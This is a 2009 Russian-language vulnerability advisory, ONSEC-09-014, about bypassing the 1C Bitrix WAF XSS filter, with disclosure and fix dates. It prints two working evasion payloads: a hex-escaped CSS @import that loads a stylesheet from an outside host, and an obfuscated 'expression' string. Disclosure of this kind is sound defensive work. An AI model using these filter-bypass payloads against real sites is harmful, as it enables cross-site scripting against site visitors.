Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1897-1] New horde3 packages fix arbitrary code execution

  [ONSEC-09-010] Undersky CMS SQL injection

  [ONSEC-09-017] Blogolet PHP including

  [ONSEC-09-016] Blogolet XSS

From:ONSEC
Date:28 сентября 2009 г.
Subject:[ONSEC-09-014] 1C Bitrix WAF multiple XSS

Цель: 1C Bitrix WAF <=8.0.5
Тип: Межсайтовый скриптинг
Угроза: Средняя
Дата обнаружения: 29.08.2009
Дата оповещения разработчика: 29.08.2009
Дата выхода исправления: 01.09.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Проактивный фильтр WAF системы управления контентом 1С-Битрикс осуществляет проверку входных данных пользователя на наличие потенциально опасных строк. Он имеет огромную базу регулярных выражений и фильтрует множество вариантов реализаций SQL инъекций, Includes, XSS. Обход фильтра был найден после недолгого подбора по следующим векторам:

<style>
@\69\6D\70\6F\72\74 url(http://onsec.ru/xss.css);
</style>

e\xp\re\s\s\i\o\n

Из-за ограниченного времени исследователя, других попыток обойти фильтр сделано не было. Затраченное время на подбор составило 40 минут.

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород